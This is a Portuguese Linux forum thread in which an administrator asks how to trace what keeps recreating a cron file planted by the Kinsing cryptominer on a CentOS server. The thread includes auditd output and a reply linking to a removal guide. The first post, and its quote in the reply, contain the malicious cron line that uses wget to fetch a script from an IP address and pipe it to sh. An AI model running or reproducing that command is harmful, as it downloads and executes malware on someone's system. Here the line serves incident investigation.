Identificar como um arquivo esta sendo criado e modificado

1. Identificar como um arquivo esta sendo criado e modificado

Junior
carel

(usa CentOS)

Enviado em 14/08/2020 - 17:16h

Boa tarde, peço desculpas se o local de criação estiver incorreto.

A situação é a seguinte:

Temos clientes que utilizam servidores cuja iso é modificado baseada em centos 6.5 e que rodam apache, exim, freeradius e amis alguns serviços.
Ocorreu que um desses servidores foi infectado com o malware kinsing. Eu consegui parar o funcionamento tirando as permissões dos arquivos kinsing e kdevtmpfsi que frealiza mineração.

A minha duvida é como identificar quem esta criando e editando um arquivo em especifico em /var/spool/cron/apache. Esse arquivo contem * * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
Utilizei o auditd e consegui a seguinte informação ao utilizar o comando ausearch -f /var/spool/cron/apache -i

type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=4 name=/var/spool/cron/apache inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=CREATE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=3 name=/var/spool/cron/apache inode=30410404 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=DELETE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=2 name=/var/spool/cron/tmp.XXXXFzvyKl inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=DELETE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=1 name=/var/spool/cron/ inode=30409690 dev=fd:01 mode=dir,700 ouid=root ogid=root rdev=00:00 nametype=PARENT
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=0 name=/var/spool/cron/ inode=30409690 dev=fd:01 mode=dir,700 ouid=root ogid=root rdev=00:00 nametype=PARENT
type=CWD msg=audit(14-08-2020 16:56:26.753:12422092) : cwd=/var/sistema/bloqueio/html
type=SYSCALL msg=audit(14-08-2020 16:56:26.753:12422092) : arch=x86_64 syscall=rename success=yes exit=0 a0=560f047863e0 a1=7ffdd0978840 a2=0 a3=31312e3634312e33 items=5 ppid=6427 pid=8350 auid=apache uid=apache gid=apache euid=root suid=root fsuid=root egid=apache sgid=apache fsgid=apache tty=(none) ses=1307812 comm=crontab exe=/usr/bin/crontab key=apache-file
----
type=PATH msg=audit(14-08-2020 16:57:01.772:12422149) : item=0 name=/var/spool/cron/apache inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=NORMAL
type=CWD msg=audit(14-08-2020 16:57:01.772:12422149) : cwd=/var/spool/cron
type=SYSCALL msg=audit(14-08-2020 16:57:01.772:12422149) : arch=x86_64 syscall=open success=yes exit=7 a0=7ffe48a5f4c0 a1=800 a2=0 a3=1999999999999999 items=1 ppid=1 pid=24908 auid=root uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=1297806 comm=crond exe=/usr/sbin/crond key=apache-file

Já tentei deletar o arquivo /var/spool/cron/apache, tirar as permisões com chmod 000 e chmod -x, mas depois de um tempo ele sempre voltar como tava.

Alguem sabe como identificar como esse arquivo é alterado?


  


2. Re: Identificar como um arquivo esta sendo criado e modificado

Marcelo Oliver
msoliver

(usa Debian)

Enviado em 14/08/2020 - 17:46h


carel escreveu:

Boa tarde, peço desculpas se o local de criação estiver incorreto.

A situação é a seguinte:

Temos clientes que utilizam servidores cuja iso é modificado baseada em centos 6.5 e que rodam apache, exim, freeradius e amis alguns serviços.
Ocorreu que um desses servidores foi infectado com o malware kinsing. Eu consegui parar o funcionamento tirando as permissões dos arquivos kinsing e kdevtmpfsi que frealiza mineração.

A minha duvida é como identificar quem esta criando e editando um arquivo em especifico em /var/spool/cron/apache. Esse arquivo contem * * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
Utilizei o auditd e consegui a seguinte informação ao utilizar o comando ausearch -f /var/spool/cron/apache -i

type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=4 name=/var/spool/cron/apache inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=CREATE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=3 name=/var/spool/cron/apache inode=30410404 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=DELETE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=2 name=/var/spool/cron/tmp.XXXXFzvyKl inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=DELETE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=1 name=/var/spool/cron/ inode=30409690 dev=fd:01 mode=dir,700 ouid=root ogid=root rdev=00:00 nametype=PARENT
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=0 name=/var/spool/cron/ inode=30409690 dev=fd:01 mode=dir,700 ouid=root ogid=root rdev=00:00 nametype=PARENT
type=CWD msg=audit(14-08-2020 16:56:26.753:12422092) : cwd=/var/sistema/bloqueio/html
type=SYSCALL msg=audit(14-08-2020 16:56:26.753:12422092) : arch=x86_64 syscall=rename success=yes exit=0 a0=560f047863e0 a1=7ffdd0978840 a2=0 a3=31312e3634312e33 items=5 ppid=6427 pid=8350 auid=apache uid=apache gid=apache euid=root suid=root fsuid=root egid=apache sgid=apache fsgid=apache tty=(none) ses=1307812 comm=crontab exe=/usr/bin/crontab key=apache-file
----
type=PATH msg=audit(14-08-2020 16:57:01.772:12422149) : item=0 name=/var/spool/cron/apache inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=NORMAL
type=CWD msg=audit(14-08-2020 16:57:01.772:12422149) : cwd=/var/spool/cron
type=SYSCALL msg=audit(14-08-2020 16:57:01.772:12422149) : arch=x86_64 syscall=open success=yes exit=7 a0=7ffe48a5f4c0 a1=800 a2=0 a3=1999999999999999 items=1 ppid=1 pid=24908 auid=root uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=1297806 comm=crond exe=/usr/sbin/crond key=apache-file

Já tentei deletar o arquivo /var/spool/cron/apache, tirar as permisões com chmod 000 e chmod -x, mas depois de um tempo ele sempre voltar como tava.

Alguem sabe como identificar como esse arquivo é alterado?

Boa tarde, busquei pelo referido IP, e encontrei várias ocorrências.....
Veja se a dica abaixo funciona:
https://cnasolution.com/questions/96651/perfect-solution-for-kdevtmpfsi-mining-virus-and-his-daemon-...
Boa sorte!!!

______________________________________________________________________
Importante: echo -e "\n$(lynx --dump goo.gl/a9KeFc|sed -nr '/^[ ]+Se/,/dou.$/p')\n"
Att.: Marcelo Oliver
______________________________________________________________________


3. Re: Identificar como um arquivo esta sendo criado e modificado

Junior
carel

(usa CentOS)

Enviado em 14/08/2020 - 18:05h

Então, eu já fiz esses procedimentos, só que no nosso servidor não tem esse caminho do crontab.
Ele tem o /var/spool/cron/apache e dentro desse arquivo "apache" tem a linha wget que baixa o script. A questão é que sempre que deleto esse arquivo apache ou altero, depois de um tempo ele é criado novamente.
E não consegui identificar o que cria ele.






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts